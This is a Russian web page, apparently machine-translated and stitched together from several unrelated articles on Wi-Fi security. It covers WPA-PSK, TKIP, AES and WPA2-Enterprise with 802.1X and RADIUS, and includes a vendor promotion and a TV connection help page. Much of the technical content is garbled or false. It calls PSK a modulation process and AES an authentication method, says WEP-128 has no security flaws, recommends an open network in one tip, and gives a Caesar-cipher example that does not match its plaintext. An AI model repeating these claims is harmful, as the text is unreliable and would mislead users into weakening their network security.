Работа может остановиться, если не работает только Slack или Google Docs. Когда интернет не работает? Вы можете попрощаться с продуктивностью. Когда кто-то крадет PSK, он может отключить сеть на несколько дней или даже недель. Согласно отчету Verizon о расследовании нарушений данных за 2019 год, 29% сетевых нарушений в 2019 году были связаны с использованием украденных учетных данных.Если кто-то намеревается атаковать вашу компанию, использование учетных данных — эффективный способ получить доступ. Стоит ли простота WPA2-PSK потери бесчисленных дней, когда сотрудники могут получить доступ к Интернету в офисе?

Это только полдела. Для решения проблемы утерянных или украденных учетных данных требуется их сброс. В сети WPA2-Personal это означает, что каждый пользователь сети должен перезагрузить и повторно подключить все свои устройства. Это ложится тяжелым бременем на ИТ-отдел любой организации и может стать кошмаром для сетевого администратора.Реконфигурация всех подключенных устройств должна выполняться быстро, чтобы избежать нарушения беспроводного доступа.

Отсутствие информации о том, кто получает доступ к вашей корпоративной сети, является еще одним недостатком беспроводной безопасности PSK. Невозможность гарантировать идентификацию ваших пользователей или тип устройств в вашей среде делает управление вашей сетью практически невозможным, а попытка обеспечить надзор за авторизованными пользователями может привести к катастрофе.

В целом, аутентификация на основе учетных данных является низшей формой сетевой безопасности.Какая более сильная альтернатива?

Лучшие альтернативы WPA2-PSK

Объяснение того, почему используется PSK, важно при внедрении самого последнего и самого лучшего стандарта, используемого сегодня; Аутентификация 802.1x с шифрованием WPA2-Enterprise. Вместо использования учетных данных 802.1x позволяет выполнять аутентификацию с помощью сертификатов (например, Active Directory или LDAP). Хотя можно утверждать, что внедрение 802.1x затруднено из-за необходимости наличия сервера RADIUS и более строгих требований к конфигурации, в большинстве организаций уже имеется внутренняя инфраструктура (например, домен Microsoft), что затрудняет настройку 802.1x ветерок.

Защитите свою сеть 802.1x с помощью аутентификации EAP-TLS

Аутентификация на основе сертификатов основана на протоколе EAP-TLS с проверкой сертификата сервера, что делает его практически неуязвимым для беспроводных атак. Зашифрованный туннель EAP блокирует любой несанкционированный доступ к информации, отправляемой для аутентификации, а проверка сертификата сервера гарантирует, что идентифицирующая информация будет отправлена ​​только на правильный RADIUS.

Входным барьером для многих организаций является клеймо, что сертификаты сложны для правильной настройки как пользователем, так и организацией.Разрешать пользователям настраивать сертификаты вручную — ошибка, учитывая, что этот процесс включает в себя несколько сложных шагов, для понимания которых требуется высокий уровень знаний в области ИТ.

Решение для адаптации JoinNow от

SecureW2 упрощает процесс для всех участников. Для ИТ-отдела организации решением является система plug-n-play, которую можно настроить в течение нескольких часов для распространения сертификатов. После того, как адаптационное программное обеспечение будет распространено среди пользователей, организация увидит заметное снижение количества обращений в службу поддержки, связанных с подключением.

На стороне конечного пользователя процесс настройки устройства для сертификатов неизмеримо упрощается. Процесс сводится к нескольким простым шагам, предназначенным для точного выполнения любым пользователем сети. После того, как пользователь оснащен сертификатом, его устройство будет автоматически и безопасно аутентифицироваться всякий раз, когда он находится в зоне действия сети, и будет оставаться на связи в течение всего срока действия сертификата.


Итог: проверка подлинности 802.1x с шифрованием WPA2-Enterprise — это НАИЛУЧШИЙ способ обеспечить безопасность беспроводной сети.Не верьте нам на слово — попробуйте сами с нашей бесплатной демоверсией!

Что такое общий ключ защищенного доступа Wi-Fi (WPA-PSK)?

Что означает общий ключ защищенного доступа Wi-Fi (WPA-PSK)?

Wi-Fi Protected Access Pre-Shared Key или WPA-PSK — это система шифрования, используемая для аутентификации пользователей в беспроводных локальных сетях. Обычно он используется телекоммуникационными компаниями для доступа конечных пользователей к домашним локальным сетям.

WPA-PSK также может называться WPA2-PSK или WPA Personal.

Techopedia объясняет предварительный общий ключ защищенного доступа Wi-Fi (WPA-PSK)

При использовании протокола WPA-PSK передача данных шифруется и контролируется с использованием пароля, сгенерированного конечным пользователем. В протоколе TKIP WPA-PSK использует 128-битное шифрование. WPA-PSK можно использовать со стандартом AES, который является распространенным стандартом анализа кибербезопасности.

В отличие от коммерческих систем WPA, метод WPA-PSK не требует центрального сервера или различных видов пользовательского ввода.

WEP и WPA

Важно отметить, что WPA-PSK является одной из множества альтернатив для этого типа аутентификации и проверки беспроводной локальной сети.

Другой называется эквивалентной защитой проводных сетей (WEP).

Интересно, что оба этих протокола используют общий ключ, но шифрование в WEP считается более слабым, чем шифрование в системах WPA. В результате некоторые телекоммуникационные службы перешли на использование WPA вместо протокола WEP для шифрования и аутентификации.

WPA и общий ключ

Одним из основных аспектов безопасности WPA-PSK является использование общего ключа.

Концепция предварительного общего ключа восходит к примитивной нецифровой криптографии прошлых веков.Идея состоит в том, что пользователи использовали первоначальный безопасный канал для доставки ключа, а затем в будущем отправляли вторичные передачи, где шифрование зависело от этого начального ключа.

Можно вспомнить некоторые простые книжные шифры начала и середины тысячелетия, когда получатели использовали предварительно общий ключ для декодирования сообщений, отправляемых в зашифрованном виде на печатных страницах книги. Ключом часто была книга, в которой и отправитель, и получатель могли измерить равноудаленные маркировки последовательности букв.Ключ может быть доставлен лично.

После этого отправитель мог отправить набор чисел, соответствующих равноудаленной последовательности, совпадающей с буквами в книге. Без лежащей в основе книги, предварительного общего ключа, набор чисел не поддавался бы анализу или взлому кода. Таким образом, код был не шифром, а ссылкой на сам предварительный общий ключ.

В текущем контексте предварительный общий ключ — это цифровой актив, который разблокирует зашифрованные сообщения, отправляемые по сети. Таким образом, это может быть полезно для противодействия атакам грубой силы, когда хакеры пытаются взломать шифрование после успешного перехвата передаваемых пакетов данных.Опять же, предварительный общий ключ делает зашифрованные данные менее зависимыми от взломанных шифров.

Хотя предварительный общий ключ и другие аспекты WPA-PSK могут быть полезны в этом типе системы аутентификации, стандарт аутентификации переходит от простой системы паролей к многофакторной аутентификации (MFA).

Одним из наиболее распространенных способов является использование смартфона в качестве дополнительного фактора аутентификации устройства. Здесь, где может быть возможно взломать пароль с помощью атаки грубой силы, MFA усложняет взлом учетной записи пользователя, потому что, если хакер каким-либо образом не получит ключ проверки, отправленный на мобильное устройство, попытки несанкционированного доступа победят. не работает.

Первый стандарт WPA стал доступен в 2003 году. Следующий стандарт, WPA2, был введен в следующем году. В 2018 году стал доступен новый стандарт WPA3.

wpa-psk [tkip] + wpa2-psk [aes]

Что такое wpa-psk [tkip] + wpa2-psk [aes] ? Где он используется? Когда вы покупаете маршрутизатор, вы заметите, что многие модели предлагают несколько вариантов безопасности. Но не все параметры безопасности Wi-Fi одинаковы. Это не секрет для нас. Именно по этой причине мы тестируем маршрутизаторы и потратили бесчисленное количество инженерных часов, оптимизируя наши рекомендации на основе этих результатов.Чтобы сделать беспроводную сеть безопасной, вам, вероятно, потребуется настроить несколько протоколов безопасности беспроводной сети. Схемы нумерации и технический жаргон могут показаться запутанными. Например, WPA/WPA2 Personal, также известный как WPA-PSK (предварительно общий ключ защищенного доступа Wi-Fi). Это позволяет вам войти в систему, введя кодовую фразу (короткую последовательность букв и цифр) с помощью клавиатуры вашей беспроводной точки доступа и вашего компьютера.

wpa-psk [tkip] + wpa2-psk [aes]

Что поддерживает маршрутизатор?

Маршрутизатор может поддерживать только WEP.Например,

  1. Он не поддерживает более новые и безопасные протоколы безопасности WPA или WPA2. Некоторые маршрутизаторы могут подключаться к Wi-Fi-клиентам (ноутбукам или мобильным устройствам) по стандарту N. Это медленнее и менее безопасно, чем более новый стандарт 802.11n, используемый в большинстве современных беспроводных сетей.
  2. Маршрутизаторы, включающие WPA2-PSK (TKIP), WPA2-PSK (AES) и WPA2-PSK (TKIP/AES) в качестве опций, обеспечивают самую быструю и безопасную беспроводную сеть. Однако выбор этих параметров не всегда означает, что вы включили все три.WEP, WPA и WPA2 — это основные протоколы безопасности, которые вы увидите при настройке беспроводной сети.

читайте также: Код ошибки 224003- Как исправить

Что такое [tkip] и [aes]?

В сети Wi-Fi TKIP и AES — это две разные системы шифрования. AES — это более новый, более безопасный протокол шифрования, представленный в WPA2 для замены старого шифрования WEP. Вы всегда должны использовать AES поверх TKIP, так как он гораздо более надежен и не имеет известных значительных уязвимостей.При использовании AES, которые есть при использовании TKIP. Что делать, если в вашей сети есть старое устройство, которое не поддерживает AES, но его необходимо оставить в Интернете? Ответ ТКИП. Еще одна новая функция под названием Multiple SSID позволит вам создать две сети Wi-Fi из одной точки доступа. Один из SSID будет работать безопасно (AES), а другой, работающий с TKIP, подойдет тем устаревшим устройствам, которым это необходимо.

Advanced Encryption Standard (AES) — гораздо более безопасный протокол шифрования, который теперь предпочтительнее TKIP.AES использует криптографию с симметричным ключом для шифрования данных. Это означает, что обе стороны диалога должны использовать один и тот же секретный ключ. Важно отметить, что вы используете старое устройство, которое поддерживает только TKIP или WEP. Он не будет подключаться к вашему новому маршрутизатору, если вы не включите один из этих устаревших протоколов на самом маршрутизаторе.

Что такое wpa-psk [tkip] + wpa2-psk [aes]?

wpa-psk [tkip] + wpa2-psk [aes] означает защищенный доступ Wi-Fi , включая [PSK] предварительный общий ключ с [TKIP] протокол целостности временного ключа объединение по секундам уровень [WPA] Wi-Fi Protected Access и [PSK] Pre-Shared Key , включая [AES] Advanced Encryption Standard , которые объединяют правило Encryption с надежным этикетом и законами для Wi-Fi для защиты от вредоносных программ.

Как защитить эту сеть TKIP?

Если вы застряли с использованием точки доступа на основе TKIP, AiroPeek — это небольшой элемент сетевого оборудования Wi-Fi. Это позволяет клиентам WPA и WPA2 расшифровывать зашифрованный TKIP трафик Wi-Fi. Это означает, что у злоумышленника есть ваш текстовый пароль и он отслеживает сетевой трафик. AiroPeek может сбрасывать предварительно зашифрованный трафик TKIP от точки доступа, когда он поступает на его беспроводную карту. WPA2 использует AES для шифрования данных, отправляемых по сети Wi-Fi, и гораздо более надежный протокол шифрования, чем старое шифрование WEP.Если вы хотите подключиться к домашнему Wi-Fi, вам придется тщательно выбирать режимы безопасности из списка.

Не пропустите: Ошибка: Пакет android.support.annotation не существует

Существуют различные советы по режимам безопасности Wi-Fi. Вот список советов.

Совет 1. Не подключайтесь к доступной сети Wi-Fi

В большинстве домашних сетей есть кодовая фраза для защиты от нежелательных гостей, но в общедоступных открытых сетях Wi-Fi ее нет. Поэтому вам не следует подключаться к доступной сети Wi-Fi, особенно во время путешествия за границу.Это открывает ваше устройство для угроз безопасности.

Совет 2. Использование WEP

WEP (Wired Equivalent Privacy) — старый протокол для обеспечения безопасности беспроводной сети. К сожалению, он имеет слабую связь, и вы действительно не должны использовать его. Созданный экспертом по национальной безопасности, WPA2 создан для современного мира более оригинальных мобильных устройств. Эта надежная технология шифрования предотвращает прослушивание вашего Wi-Fi-соединения другими лицами.

Совет 3: Использование WEP 128

При использовании WEP 128 не было обнаружено недостатков безопасности.Ни для одного из них нет свободных пакетов ключа шифрования. Вместо этого проблема с WEP заключалась в фундаментальном отсутствии сложности, и даже большие размеры ключа шифрования не решают эту проблему.

Совет 4: WPA (TKIP)

Последняя версия WPA (TKIP) — лучший вариант для Windows XP. Он заменен WPA2, но все еще довольно широко используется. Многие маршрутизаторы имеют эту опцию, поскольку она считается наиболее совместимой с наименьшими трудностями при настройке.

Совет 5: WPA-PSK (AES)

Параметр WPA-PSK (AES) является заменой TKIP, который проблематичен, поскольку имеет известные недостатки безопасности.AES шифрует данные на уровне 256 бит и является самым надежным шифрованием, которое вы можете использовать, не беспокоясь о проблемах совместимости.

Совет 6: настройте открытую сеть

Чтобы все устройства всегда были подключены. Поэтому желательно настроить открытую сеть вместо типа подключения WPA2-PSK (TKIP). Однако, учитывая, что базовая станция iHomes Apple Airport Express может подключаться только с этим типом шифрования, гибридная сеть может помочь передавать музыку по беспроводной сети в вашей гостиной.

Совет 7: WPA2-PSK (AES)

WPA2-PSK (AES), вероятно, лучший выбор пароля, если вы только начинаете. На некоторых устройствах вы можете видеть только WPA2. Это тоже хорошо, так как это просто означает WPA2 + AES.

Совет 8. WPA2-Personal

Многие современные и устаревшие устройства в наших сетях поддерживают только WPA2-PSK и не могут подключаться к WPA2-Personal или WPA2-Enterprise. Развертывание этого параметра упрощает подключение пользователей к сети с помощью устройств, которые в противном случае были бы несовместимы с этими сетями.

Завершение

В заключение WPA-PSK [TKIP] + WPA2-PSK [AES] , с включенным шифрованием WPA2, вы не столкнетесь с этой проблемой. Новый стандарт имеет встроенные параметры безопасности, которые не будут ограничивать работу сети Wi-Fi на полной скорости. Однако WPA2 является стандартом и уязвим для взлома, как и WEP. Кроме того, его немного сложнее настроить на маршрутизаторе Wi-Fi, чем WPA, но как только он будет включен в вашей домашней сети, вы сможете подключаться через 802.Устройства 11n и 802.11ac на полной скорости. Выберите TKIP или AES с WPA2 — это зависит от прошивки вашего беспроводного маршрутизатора. Используйте AES, если он предлагает это. В противном случае используйте то, что поддерживает прошивка вашего маршрутизатора. AES более безопасен и поддерживается большим количеством устройств, поэтому давайте выберем его.

Мой телевизор не подключается к моей беспроводной сети с помощью точки беспроводного доступа

ВАЖНО: Эта статья относится только к определенным продуктам и/или операционным системам. Подробную информацию см. в разделе «Применимые продукты и категории ».

Нам стало известно, что некоторые устройства с точками беспроводного доступа (WAP) не будут подключаться к телевизору по беспроводной сети при использовании режима безопасности WPA2 Personal . Чтобы решить эту проблему, измените настройку режима безопасности вашей точки доступа на WPA2 Personal Mixed или WPA . Для получения помощи в изменении настроек вашей точки доступа обратитесь к руководству по вашей точке доступа или обратитесь к производителю устройства или к поставщику услуг Интернета (ISP). Если вы не можете изменить настройку типа безопасности вашей точки беспроводного доступа, вы все равно можете подключиться к телевизору, используя режим ручного ввода телевизора.

Примечание: Для подключения к телевизору в режиме ручного ввода на некоторых этапах может потребоваться знание конкретных настроек, использованных при настройке маршрутизатора. Если вы не знаете эти настройки, проверьте свое устройство для подтверждения. Для получения помощи в настройках вашего устройства обратитесь к руководству по вашей точке доступа или обратитесь к производителю устройства или к поставщику услуг Интернета (ISP).

Режим ручного ввода ТВ

  1. На прилагаемом пульте нажмите кнопку Home .
  2. Выберите Настройки .
  3. Выберите Сеть .
  4. Выберите Настройка сетевого подключения .
  5. Выберите Пользовательский .
  6. Выберите Настройка беспроводной сети .
  7. Выберите Сканировать .
  8. Выберите Ввод вручную .
  9. Введите SSID вашей сети (имя вашей беспроводной сети).
  10. Выберите тип режима безопасности из следующих доступных вариантов:
      • 3
      • WEP
      • WPA / WPA2-PSK (TKIP)
      • WPA / WPA2-PSK (AES)

      Примечание: WPA / WPA2-PSK (AES) часто является настройкой по умолчанию для многих точек доступа.Если вы не знаете, какой тип безопасности был выбран при настройке вашей сети, вы можете попробовать каждый из этих параметров, пока не найдете тот, который работает, или проверить настройки устройства точки доступа для подтверждения.

    • Введите ваш Пароль .
    • Выберите Настройка IP-адреса: Авто .
    • Выберите Прокси-сервер: Нет .
    • Подключиться к сети.

Что такое WPA, PSK, WPA2, TKIP и AES

wpa-psk [tkip] + wpa2-psk [aes]

Полное описание wpa-psk [tkip] + wpa-psk [tkip] + wpa2-psk [aes] [aes] : WPA — PSK / WPA2 — PSK, TKIP и AES; и правильный способ их использования.Если бы кто-нибудь спросил вас, каковы самые важные потребности человека; тогда большое количество читателей будет говорить о трех основных и социально принятых терминах: еда, одежда и кров. А что, если кто-то спросит вас, каковы требования, необходимые для выживания ваших данных? Совершенно очевидно, что ответ будет не таким, как в случае с людьми. Большинство читателей дадут такие ответы, как правильное обслуживание, антивирусное программное обеспечение или любое другое. Мы не можем сказать, какой ответ неправильный или какое решение правильное.Но можно с уверенностью сказать, что самым главным требованием является «Защита».

WPA-PSK [TKIP] + WPA2-PSK [AES]

   Защита, но от кого?

               Это может быть защита от вредоносных программ, защита от коррупции, вирусов или от рук интригана. Если ваши данные не защищены, то любому человеку будет легко получить контроль над вашими данными. Без определенного уровня защиты вы можете проверять состояние своих данных тысячу раз за один день, но это будет небезопасно.Многогранный меч угроз, вредоносных программ, троянов и других угроз будет продолжать скрываться над ним. И нет никакой гарантии, что меч не навредит данным. Итак, лучшее, что вы можете сделать, это максимально защитить свои данные с помощью кибербезопасности.

Вы не сможете защитить данные с помощью больших мускулов, если не найдете хакера , который повредил вашу систему. В этом виртуальном мире данных, которые свободно циркулируют, единственный способ защитить данные — создать виртуального охранника.Охранник может быть паролем, булавкой, замком и самым сильным способом защиты, также «Шифрование». После того, как вы заблокировали свои данные виртуальным замком, вы можете сказать, что ваши данные в безопасности. Но пока никто другой, кроме вас, не имеет доступа к паролю или ключу. Но среди этих способов защиты ваших данных лучшим способом является использование Шифрования. Сначала вам нужно понять, что такое шифрование.

Что это за метод шифрования?

Возможно, вы использовали различные типы блокировок в операционной системе вашего устройства.Существуют различные типы замков, такие как блокировка отпечатков пальцев , блокировка распознавания лиц, блокировка булавкой, блокировка паролем, блокировка шаблона и блокировка вопроса. Возможно, вы уже давно их используете, но шифрование — это нечто другое. Его нельзя легко сломать. И в большинстве случаев пройти его без ключа дешифрования невозможно. Но, как вы, возможно, знаете, есть исключения во многих вещах (не во всех). И в этом случае некоторые вещи, такие как вирусы, использующие шифрование, могут быть взломаны , чтобы получить доступ к данным без ключа дешифрования. Блокирует данные по определенному шаблону. А то только ключ расшифровки это инструмент . Ключ дешифрования восстанавливает данные в исходном виде.

Как работает шифрование?

Метод шифрования данных иногда требует много времени, но результат того стоит. Когда мы используем метод шифрования , данные перемещаются из исходного состояния в определенный шаблон . Например, исходный фрагмент данных в вашей системе содержит текстовый файл со следующей строкой — «Сегодня хороший день» .Теперь вам нужно передать данные и зашифровать данные с помощью ключа шифрования — «Сдвиг на 3» . По ключу все символы будут переведены из исходного состояния в символ, который находится в трех шагах. Итак, зашифрованное сообщение станет ‘Wrgdb lv d jrrggdb’ .

Подробнее: NET::ERR_CERT_WEAK_SIGNATURE_ALGORITHM

Сила шифрования .

          Без ключа расшифровки трудно читать и интерпретировать, верно? В данном случае ключ расшифровки — «Сдвиг назад на 3» .После ввода ключа дешифрования данные будут восстановлены до нормального состояния. Вы могли бы также поставить блокировку паролем с паролем в качестве ключа шифрования. Но если кто-то его увидит, то ваши данные в опасности. Таким образом, это доказывает, что шифрование данных является лучшим.

Зачем вам нужна защита или шифрование?

Вы можете подумать, зачем защищать данные или шифровать их, что иногда занимает много времени? Но этот действительно важен, если вы не хотите отдавать контроль над своими данными или системой кому-то другому. Ибо в виртуальном мире нельзя оставаться со своими данными и защищать их физической силой. Итак, вам нужен виртуальный замок, который также может быть в виде шифрования.

Есть тысячи угроз, которые сидят снаружи, чтобы получить контроль над вашими данными, а затем изменить, удалить или остановить их дальнейшее распространение в своих интересах . И это произойдет в мгновение ока, если вы не приложите усилий, чтобы попробовать. Они никогда не будут думать об ущербе, который вы терпите .Поэтому никогда не забывайте делать резервные копии важных файлов и защищать их с помощью списка шагов. Это могут быть:

  •      Установка антивирусного программного обеспечения
  •      Создание брандмауэра вокруг важных файлов
  •      Регулярно делайте резервные копии важных файлов и храните их в изолированном месте.
  •      Используйте встроенные функции, такие как точки восстановления и частое сканирование на наличие угроз.

Вы должны попытаться выполнить все шаги и предпринять необходимые шаги.Это обеспечит более высокий уровень защиты вашей системы и данных.

Что такое wpa-psk [tkip] + wpa2-psk [aes]?

wpa-psk [tkip] + wpa2-psk [aes] означает Wi-Fi Protected Access с Pre-Shared Key включая Temporal Key Integrity Protocol в сочетании с Wi-Fi Protected второго уровня Получите доступ к с Pre-Shared Key , включая Advanced Encryption Standard, который включает в себя процесс Encryption с определенными протоколами и правилами для Wi-Fi для защиты от хакеров.

Возможно, вы хотя бы раз пользовались Wi-Fi или мобильной точкой доступа. Это поможет вам делать что-либо в Интернете без использования мобильных данных (за которые иногда взимается дополнительная плата). Есть еще одно преимущество Wi-Fi, которое заключается в том, что скорость интернета в Wi-Fi намного выше, чем скорость в мобильной сети передачи данных. Но есть один недостаток использования Wi-Fi. Именно во время его использования ваше устройство видно ближайшим устройствам, и это может помочь кому-то получить доступ к системе.Такие инциденты происходят очень часто, когда вы используете открытый Wi-Fi в общественных местах, таких как магазины . И чтобы устранить эту уязвимость, — это уровень безопасности, известный как WPA , который устанавливается в этих сетях.

Что такое WPA?

             WPA означает «защищенный доступ Wi-Fi ». Он был разработан для обеспечения безопасности беспроводных сетей. Данные, зашифрованные при отправке в разные системы, расшифровываются с помощью ключа. Ранее все системы использовали один и тот же ключ шифрования и дешифрования . Это облегчило интриганам создание своего ключа дешифрования, совпадающего с исходным. Но с WPA меняется ключ дешифрования для разных систем. Это затрудняет хакерам создание собственного ключа дешифрования. Для этой задачи WPA использует TKIP.

  Что такое TKIP?

           Расшифровывается как «Протокол целостности временного ключа» .Этот TKIP является инструментом, который WPA использует для предоставления различных ключей дешифрования различным системам .

Что такое PSK и что такое WPA2 или WPA-2?

Поначалу эти краткие формы могут показаться запутанными. Но поняв их досконально, вы познакомитесь с ними. Мы уже знаем, что означает термин WPA. Теперь пришло время PSK.

Что такое PSK?

         PSK означает «Предварительно общий ключ» .Это процесс цифровой модуляции, в котором используется строка из 64 цифр, которая генерирует уникальные ключи дешифрования для разных пользователей сети. PSK — это один из двух методов аутентификации, используемых WPA и WPA-2. Чаще всего используется для сетей в жилых домах. Он также использует TKIP для создания уникальных ключей шифрования . Затем, если пользователь пытается подключиться к беспроводной сети, PSK запрашивает пароль, и если предоставленный пароль совпадает с паролем PSK, пользователь подключается к сети.

Что такое WPA-2? Это очень безопасная форма беспроводной защиты. Для защиты используется пользовательский ключ. Его также можно считать эволюцией WPA-1 или просто преемником WPA.

Что такое AES?

Как было сказано ранее, в WPA и WPA-2 есть два метода аутентификации.Один из них, PSK, был описан выше. Другой метод аутентификации — AES . Это просто расшифровывается как «Advanced Encryption Standard ».

Немного исторических фактов Это необходимо для компьютерной безопасности и защиты данных. Он использует одни и те же секретные ключи для доступа к данным, то есть отправитель и получатель получают один и тот же секретный ключ. Этот метод шифрует данные тремя блоками разной длины: 128, 192 и 256 блоков. Это очень надежный инструмент шифрования, и данные также могут быть защищены от атак грубой силы.

Что использовать, AES или PSK или TKIP?

Из информации, которую вы прочитали обо всех трех методах шифрования, как вы можете догадаться, AES является лучшим. Он использует симметричный ключ (один и тот же ключ для отправителя и получателя) , имеет надежную защиту и также является экономичным.Он также используется для защиты данных, находящихся в состоянии покоя. Но, как говорят эксперты, AES хорош только в том случае, если он правильно реализован.

Заключение

В заключении wpa-psk [tkip] + wpa2-psk [aes] : потребность в защите наших данных достигла рекордно высокого уровня, и теперь никто не может игнорировать ее важность. Даже незначительная ошибка в защите вашей системы может привести к переходу управления вашей системой из ваших рук в руки интригана или хакера.Поэтому безопасность ваших данных является обязательным требованием. Лучший способ сделать это — зашифровать данные. А при использовании беспроводной связи защита вашей системы может оказаться под угрозой. Для этого были разработаны различные инструменты, такие как AES, TKIP и PSK, в сочетании с WPA и другими уровнями безопасности . Однако даже самая сильная защита может иметь уязвимости. Итак, , вы должны высматривать любую неисправность или проблему, а затем только продолжать какие-либо действия с вашими ценными данными.И никогда не забывайте создавать резервные копии.

Переход на WPA/WPA2-Enterprise Wi-Fi Encryption

Эрик Гейер (основатель и владелец NoWiresSecurity) — первоначально опубликовано на InformIT.com

 

Как вы, возможно, уже знаете, безопасность Wired Equivalent Privacy (WEP) небезопасна. Этот первый стандарт безопасности беспроводной локальной сети, разработанный IEEE, был уязвим для взлома Wi-Fi-хакерами уже почти десятилетие.

В 2003 году организация Wi-Fi Alliance выпустила стандарт безопасности под названием Wi-Fi Protected Access.Хотя первая версия (WPA), в которой используется шифрование TKIP/RC4, немного потрепана, не полностью взломана и все еще может быть очень безопасной.

Вторая версия (WPA2), выпущенная в середине 2004 г., обеспечивает полную безопасность, поскольку полностью реализует стандарт безопасности IEEE 802.11i с шифрованием CCMP/AES.

В этой статье мы познакомимся с двумя совершенно разными режимами защищенного доступа Wi-Fi. Мы увидим, как и почему вы хотите перейти от простого в использовании персонального режима к режиму предприятия.

Теперь приступим!

Два режима WPA/WPA2: персональный (PSK) и корпоративный

Обе версии защищенного доступа Wi-Fi (WPA/WPA2) могут быть реализованы в одном из двух режимов:

 

  • Режим личного или предварительного общего ключа (PSK): этот режим подходит для большинства домашних сетей, но не для бизнес-сетей. Вы определяете кодовую фразу шифрования на беспроводном маршрутизаторе и любых других точках доступа (AP). Затем парольную фразу должны вводить пользователи при подключении к сети Wi-Fi.

    Хотя этот режим кажется очень простым в реализации, на самом деле он делает надлежащую защиту бизнес-сети практически невозможной. В отличие от корпоративного режима, беспроводным доступом нельзя управлять индивидуально или централизованно. Одна парольная фраза применяется ко всем пользователям. Если необходимо изменить глобальную парольную фразу, ее необходимо изменить вручную на всех точках доступа и компьютерах. Это было бы большой головной болью, когда вам нужно его изменить; например, когда сотрудник покидает компанию или когда какие-либо компьютеры украдены или скомпрометированы.

    В отличие от корпоративного режима, парольная фраза шифрования хранится на компьютерах. Таким образом, любой на компьютере — будь то сотрудники или воры — может подключиться к сети, а также восстановить кодовую фразу шифрования.

  • Режим предприятия (EAP/RADIUS): этот режим обеспечивает безопасность, необходимую для беспроводных сетей в бизнес-среде. Хотя его сложнее настроить, он предлагает индивидуальный и централизованный контроль над доступом к вашей сети Wi-Fi.Пользователям назначаются учетные данные для входа, которые они должны предоставить при подключении к сети, которые могут быть изменены или отозваны администраторами в любое время.
    Пользователи никогда не имеют дело с настоящими ключами шифрования. Они безопасно создаются и назначаются для каждого сеанса пользователя в фоновом режиме после того, как пользователь представляет свои учетные данные для входа. Это предотвращает восстановление сетевого ключа с компьютеров и используется в качестве стандарта в сетях.

 

Представляем аутентификацию 802.1X и серверы RADIUS

Метод аутентификации, используемый для проверки учетных данных пользователя (и сервера) в сетях WPA/WPA2-Enterprise, определен в IEEE 802.1х стандарт. Для этого требуется внешний сервер, называемый службой удаленной аутентификации пользователей по телефону (RADIUS) или сервером аутентификации, авторизации и учета (AAA), который используется для различных сетевых протоколов и сред, включая интернет-провайдеров.

Сервер RADIUS понимает язык расширяемого протокола аутентификации (EAP) и взаимодействует с беспроводными точками доступа, называемыми клиентами RADIUS или аутентификаторами. Сервер RADIUS в основном служит посредником между точками доступа и пользовательской базой данных.Затем точки доступа взаимодействуют напрямую с клиентом 802.1X, также называемым запрашивающим устройством 802.1X, на компьютере или устройстве конечного пользователя.

Аутентификация 802.1X основана на порте. Это означает, что когда кто-то пытается подключиться к защищенной корпоративной сети, связь разрешается через виртуальный порт с целью передачи учетных данных для входа. Если аутентификация прошла успешно, ключи шифрования безопасно передаются, и конечному пользователю предоставляется полный доступ.

Получение сервера аутентификации

Есть несколько способов получить 802.1X сервер аутентификации:

  • FreeRADIUS: Это один из самых популярных серверов AAA в мире. Хотя это бесплатный проект с открытым исходным кодом, он больше подходит для продвинутого ИТ-персонала. Он доступен для многих различных платформ, включая Linux, Mac OS X и Windows. По умолчанию вы меняете настройки в конфигурационных файлах.

  • Windows Server: если у вас уже настроен Windows Server, вы можете использовать встроенную службу проверки подлинности в Интернете (IAS) в Windows Server 2003 или сервер политики сети (NPS) в Windows Server 2008.

  • Аутсорсинговые услуги: Хостинговые услуги, такие как AuthenticateMyWiFi, отлично подходят для тех, кто не хочет вкладывать много денег или времени в настройку сервера RADIUS, имеет несколько офисов или не имеет технических знаний. также предоставляют дополнительные функциональные возможности по сравнению с традиционными серверами RADIUS.
     

Различные вкусы EAP

В основе аутентификации 802.1X лежит Extensible Authentication Protocol (EAP).Есть много типов или преимуществ EAP. Тип, который организация должна использовать, зависит от желаемого уровня безопасности, желаемой сложности и спецификаций сервера/клиента.

Вот самые популярные типы:

  • PEAP (защищенный EAP): этот метод является одним из самых популярных и простых в реализации типов EAP. Он аутентифицирует конечных пользователей с помощью имен пользователей и паролей, которые они должны вводить при подключении к сети.

    Сервер проверки подлинности также может быть проверен во время проверки подлинности PEAP, если на сервере установлен сертификат SSL.Этот тип поддерживается по умолчанию в Windows.

  • TLS (безопасность на транспортном уровне): этот тип является одним из самых безопасных вариантов, но требует большего для реализации и обслуживания. Проверка клиента и сервера выполняется с помощью SSL-сертификатов. Вместо предоставления имени пользователя и пароля при подключении устройства или компьютеры конечных пользователей должны иметь файл сертификата SSL, загруженный в его клиент 802.1X.

    Администраторы контролируют центр сертификации (ЦС) и выдают клиентские сертификаты, что дает администраторам больший контроль, но требует больше времени на администрирование.

  • TTLS (Tunneled TLS): улучшенная версия TLS, не требующая сертификатов безопасности на стороне клиента, что снижает нагрузку на управление сетью. Однако этот тип EAP не имеет встроенной поддержки в Microsoft Windows; для этого требуется сторонний клиент, такой как SecureW2.

 

Ваши следующие шаги

Вы узнали, как аутентификация 802.1X делает шифрование WPA/WPA2-Enterprise способом защиты сетей Wi-Fi в компаниях.Вы также узнали, что требуется сервер аутентификации и что PEAP, TLS и TTLS являются популярными типами EAP.

Вот несколько советов, которые помогут вам в следующих шагах:

 

  • Найдите и выберите сервер RADIUS или стороннюю службу.

  • Настройте сервер RADIUS с настройками EAP, AP и пользователя.

  • Настройте свои точки доступа с информацией о шифровании и сервере RADIUS.

  • Настройте Windows (или другую ОС) с шифрованием и 802.1Х настройки.

  • Наконец-то подключитесь к защищенной корпоративной сети!

Защита сетей с помощью WPA-PSK и WPA2-PSK

Самый простой способ защиты вашей сети с использованием стандарта WPA или WPA2 — это использование проверки подлинности с предварительным общим ключом (PSK) (называемой WPA-PSK и WPA2-PSK соответственно). Использование WPA таким образом аналогично использованию Wired Equivalent Privacy (WEP), но вы получаете дополнительное преимущество от улучшений безопасности в WPA и 802.11i, включая более надежную аутентификацию и улучшенные алгоритмы шифрования.

Связанный: Защитите свою беспроводную сеть

